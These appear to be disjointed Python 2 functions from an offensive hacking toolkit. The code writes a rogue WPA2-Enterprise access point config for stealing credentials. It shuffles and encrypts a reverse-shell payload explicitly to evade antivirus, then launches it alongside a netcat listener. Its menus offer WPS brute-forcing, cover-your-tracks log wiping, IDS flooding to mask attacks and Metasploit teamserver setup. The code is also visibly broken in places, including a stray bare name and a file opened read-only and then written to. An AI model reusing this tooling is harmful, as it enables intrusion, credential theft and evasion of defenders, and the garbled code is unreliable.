def write_hostapd_conf(): os.chdir("/root/ArmsCommander/logs/MGT_ENT_cracker/") essid_str = str( raw_input( toolkits.yellow( "Enter the ESSID ('name') you want the AP to be called: "))) bssid_str = str( raw_input( toolkits.yellow( "Enter the BSSID MAC address you want to be called: "))) channel_str = str( raw_input(toolkits.yellow("Enter what channel you want to use on: "))) w = open("hostapd.conf", "w") hostapd_conf_contents = """ interface=wlan0 driver=nl80211 ssid={0} bssid={1} logger_stdout_level=0 ieee8021x=1 eapol_key_index_workaround=0 own_ip_addr=127.0.0.1 auth_server_addr=127.0.0.1 auth_server_port=1812 auth_server_shared_secret=testing123 wpa=2 wpa_key_mgmt=WPA-EAP channel={2} wpa_pairwise=TKIP CCMP""".format(str(essid_str), str(bssid_str), str(channel_str)) w.write(hostapd_conf_contents) w.close() print toolkits.green("Your new hostapd conf file is completed") return
def commandSegmentationTech(readLines): shuffledPayload = {} ctr = 0 for l in readLines: arrayMap = [] brokenLine = l brokenLine = re.findall('..?',brokenLine) print "DEBUG: Malicious command broken apart before shuffling\r\n{}".format(brokenLine) # Generates a shuffled version of the line shuffledLine = random.sample(brokenLine,len(brokenLine)) print "DEBUG: Shuffled line to evade antivirus\r\n{}".format(shuffledLine) # build a array map to reconstitute that line for lElement in brokenLine: query = lElement index = findIndexValue(query,shuffledLine) # ArrayMap = a map of indices to reconstruct the payload arrayMap.append(index) # Add dictionary entry where shuffledPayload = {[shuffledLine]:[arrayMap]} # arrayMap = shuffledPayload[shuffledLine] # shuffledPayload = arrayMap shuffledPayload[ctr] = shuffledLine,arrayMap print "DEBUG: Array-Map to reconstitute the payload\r\n{}".format(str(arrayMap)) ctr += 1 print green("DEBUG: ShuffledPayload with ArrayMaps for reconstitution:\r\n{}".format(shuffledPayload)) return shuffledPayload
def reconstituteLine(shuffledLine,arrayMap): cmd="" print red("DEBUG: Shuffled Line to Reconstitute\r\n{}".format(shuffledLine)) print yellow("DEBUG: arrayMap to reconstitute the payload\r\n{}".format(arrayMap)) for indice in arrayMap: cmd = "{}{}".format(str(cmd),str(shuffledLine[indice])) print green("DEBUG: Reconstituted Command:\r\n{}".format(str(cmd))) return cmd
def pexpect_thread(cmd): encoding = 'utf-8' time = timer_thread() # #timesup = False thread = pexpect.spawn(cmd, timeout=300) # fout = 'airodump.log' # thread.logfile = fout # #thread.logfile_read = sys.stdout # thread.write() dogass = 'f**k you pexpect module' dogass = dogass.decode('utf-8') outcomes = thread.expect([pexpect.TIMEOUT, pexpect.EOF, dogass]) # time.sleep(5) # outcomes = pexpect.TIMEOUT if (outcomes == 0): # out of time print green("pexpect.TIMEOUT condition reached") results = thread.read() thread.terminate() w = open('./airodump.log') w.write(results) w.close() # logfile = thread.logfile elif (outcomes == 1 ): # end of file error, just send another line to throw it into loop print yellow("pexpect.EOF conditioning reached") thread.sendline('\n') # elif(outcomes==2): # results = thread.read() # thread.terminate() # w = open('./airodump.log') # w.write(results) # w.close() elif (outcomes == 2): print green("Woo, the variable is dog-ass") print yellow("Thank you so much for wasting my time.") results = thread.read() thread.terminate() w = open('./airodump.log', 'a+') w.write(results) w.close() else: exception = thread.read() exception = str(exception.encode('utf-8')).strip().rstrip() print exception x = open('./exceptions_threading.log', 'a+') x.write(exception) x.close() return results, outcomes, exceptions
def five_wireless_attacks( ): # In the age of Cyberterrorism. Only the most cunning will survive. Menu_Header = colored('WIRELESS ATTACKS', 'cyan', attrs=['bold']) print Menu_Header opt_List = [ '\n\t#0. Return to Main Menu', '#1. Cylon-Raider, automate wireless "Replay-Attacks" from the Aircrack-ng Suite', '#2. Cylon Heavy-Raider, automate the WPS PIN brute-forcing vulnerability with Reaver', '#3. Router-Sploit, Post-Exploitation hacking of APs that you cracked the passwords of', '#4. ARP Injection Test, seeing if your external wireless card is working properly', '#5. Hidden Network Decloaker, uncover hidden wireless APs', '#6. ***NEW*** DRADIUS WPA2-MGT/ENT (name tentative to change), impersonate Enterprise/Management/PEAP encrypted WPA2 Access Points, steal credentials!' ] print("\n\t".join(opt_List)) print toolkits.green('\t' + opt_List[6]) opt_Choice = str(raw_input("Enter a OPTION: ")) if opt_Choice == "0": os.system('clear') main() elif opt_Choice == "1": os.system('clear') cylon_raider() # MT_host_recon() elif opt_Choice == "2": os.system('clear') heavy_raider() # CornHarvester() elif opt_Choice == "3": os.system('clear') router_sploit() # NMap_Auto() elif opt_Choice == "4": os.system('clear') ARP_injection_test() # NMap_Custom() elif opt_Choice == "5": os.system('clear') hidden_network_decloaker() # SQLMap() elif opt_Choice == "6": os.system('clear') mgt_ent_attacker() five_wireless_attacks() else: print colored('You have entered a invalid option', 'red') five_wireless_attacks()
def readSuspectedDomains( suspectedDomains='/home/ctlister/Documents/Contract-VirusTotal/real_malware_domains.txt' ): r = open(suspectedDomains, 'r') l = r.readlines() randomlypicked = random.sample(l, 4) for line in l: host = line.strip().rstrip() print toolkits.green("Targeting {}".format(str(host))) # print red("Debug: Running investigation on host\r\n{}".format(str(host))) testFunction(host) # results = queryUrl(key,host) # print yellow(results) # writeResults(results,host) return
def launch_teamserver(login_parameters): os.chdir('/usr/share/armitage') public_ip = login_parameters[0] teamserver_password = login_parameters[1] print toolkits.green('PRE-FLIGHT: BEGINNING PRE-FLIGHT CHECKS') print toolkits.yellow('PRE-FLIGHT: Starting up PostgreSQL server') os.system('service postgresql start') print toolkits.yellow('PRE-FLIGHT: Starting up Metasploit Service') os.system('service metasploit start') print toolkits.yellow('PRE-FLIGHT: Initializing Metasploit Database') os.system('msfdb init') print toolkits.green('LAUNCHING: Starting Metasploit Database') os.system('msfdb start') print toolkits.yellow( 'LAUNCHING: Killing all RUBY processes to shut down existing PIDs of msfrpc daemon' ) os.system('killall ruby') print toolkits.yellow( 'LAUNCHING: Killing any processes occupying PORT 55553') os.system('fuser -k 55553/tcp') print toolkits.green('Starting up Teamserver!') cmd_str = """teamserver {0} {1}""".format(str(public_ip), str(teamserver_password)) os.system(cmd_str) return
def main(): decryptKey = generateKey() decryptIV = generateIV() code = read_template() template_reverse_shell payloadNoEncrypt = template_reverse_shell.splitlines() shuffledPayload = commandSegmentationTech(payloadNoEncrypt) # writableLines = convertIntoLines(shuffledPayload) l_encrypted = cryptor(shuffledPayload, decryptKey, decryptIV) outfile = writeUniquePayload(code, l_encrypted, decryptKey, decryptIV) print red("DEBUG: Shuffled payload\r\n{}".format(str(shuffledPayload))) out = b64encode(l_encrypted) print yellow("DEBUG: Encrypted payload\r\n{}".format(str(out))) print green("DEBUG: Payload generated at\r\n{}".format(str(outfile))) rp = open(outfile, 'rb+') uniquePayload = rp.read() print red("DEBUG: Contents of {}\r\n".format(str(outfile))) print yellow(uniquePayload) print cyan("Opening netcat session") os.system("""gnome-terminal -e 'bash -c "nc -nvlp {}"'""".format( str(LPORT))) print green("You may run the payload with\r\npython {}".format( str(outfile))) time.sleep(2) print green("Executing payload") os.system("python {}".format(str(outfile))) return
def three_remote_exploits_redesigned(): # Tentative project to reduce bloat Menu_Header = colored('REMOTE EXPLOITATION', 'cyan', attrs=['bold']) print Menu_Header opt_List = [ '\n\t#0. Return to Main Menu', '#1. PAYLOAD GENERATORS & LISTENERS, Metasploit Msfvenom, and open source alternatives RATs like Pupy and Stitch', '#2. TOOLKITS, Social Engineers Toolkit', '#3. OTHER, Does not fit in any other category, USB Rubber Ducky Encoders, stuff like Virus-Total Safe-Checker', '#4. ***NEW***: FOREPLAY PROJECT, Easy-Mode Hacker Collaboration, gang up on single targets, easily generate Armitage Teamservers!' ] print("\n\t".join(opt_List)) print toolkits.green('\t' + opt_List[4]) opt_Choice = str(raw_input("Enter a OPTION: ")) if opt_Choice == "0": os.system('clear') main() elif opt_Choice == "1": os.system('clear') payload_generators_listeners() three_remote_exploits_redesigned() elif opt_Choice == "2": os.system('clear') remote_exploit_toolkits() three_remote_exploits_redesigned() elif opt_Choice == "3": os.system('clear') remote_exploits_other() three_remote_exploits_redesigned() elif opt_Choice == "4": os.system('clear') foreplay() three_remote_exploits_redesigned() else: print colored('You have entered a invalid option', 'red') three_remote_exploits_redesigned() return
def two_net_defense_traffic_monitor(): Menu_Header = colored('NETWORK DEFENSE', 'cyan', attrs=['bold']) print Menu_Header opt_List = [ '\n\t#0 Return to Main Menu', '#1. Tor + Proxychains, conceal your outbound traffic', '#2. Network Monitoring Tools, p0f, Snort, and view active network connections', '#3. Cover your tracks, clear your bash history and wipe your thumbnails cache', '#4. TCP Kill a connection by host, IP, or port', '#5. NGrep or "Network Grep", investigate a suspicious connection', '#6. MacChanger, change your network card MAC address temporarily', '#7. Fuser, identify and kill processes within a port range', '#8. IDS Flooder, overwhelm a Intrusion Detection System with false-flag DDoS attacks to draw attention away from your actual activity', '#9. FAIL-2-BAN, automatic banning daemon for SSH. Absolutely essential for remote AWS servers that are subjected to constant SSH brute-force attacks', '#10. VIEW AUTH LOG, view your authentication log and make a backup of it.', '#11. ***NEW***, JKD: Bluce-Ree Edition, auto-counterattack aggressive NMAP scans using a Metasploit Server Design Flaw' ] print("\n\t".join(opt_List)) print toolkits.green('\t' + opt_List[11]) opt_Choice = str(raw_input("Enter a OPTION: ")) if opt_Choice == "0": os.system('clear') main() elif opt_Choice == "1": os.system('clear') print colored('[+] Starting Tor + Proxychains', 'green', attrs=['bold']) tor_and_proxychains() # MT_host_recon() elif opt_Choice == "2": os.system('clear') print colored('[+] Starting Monitoring Tools', 'green', attrs=['bold']) network_monitor_tools() # CornHarvester() elif opt_Choice == "3": os.system('clear') print colored('[+] Starting Cover Your Tracks', 'green', attrs=['bold']) cover_tracks() # NMap_Auto() elif opt_Choice == "4": os.system('clear') print colored('[+] Starting TCP Kill', 'green', attrs=['bold']) TCPKill() # NMap_Custom() elif opt_Choice == "5": os.system('clear') print colored('[+] Starting Network Grep', 'green', attrs=['bold']) NGrep() # SQLMap() elif opt_Choice == "6": os.system('clear') print colored('[+] Starting Mac Changer Interactive Menu', 'green', attrs=['bold']) macchanger() # OWASP_zaproxy() elif opt_Choice == "7": os.system('clear') print colored('[+] Starting Fuser', 'green', attrs=['bold']) fuser() # burpsuite() elif opt_Choice == "8": os.system('clear') print colored('[+] Starting IDS Flooder Module', 'green', attrs=['bold']) IDS_Flooder() elif opt_Choice == "9": os.system('clear') print colored('[+] Starting fail2ban Module', 'green', attrs=['bold']) fail2ban() elif opt_Choice == "10": os.system('clear') print colored('[+] Copying backup of auth.log to /root/Documents', 'yellow', attrs=['bold']) os.system('cp -r /var/log/auth.log /root/Documents') os.system('cat /var/log/auth.log') main() elif opt_Choice == "11": jkd_poc() two_net_defense_traffic_monitor() return else: print colored('You have entered a invalid option', 'red') two_net_defense_traffic_monitor() return
def green(string): string = toolkits.green(string) print string return string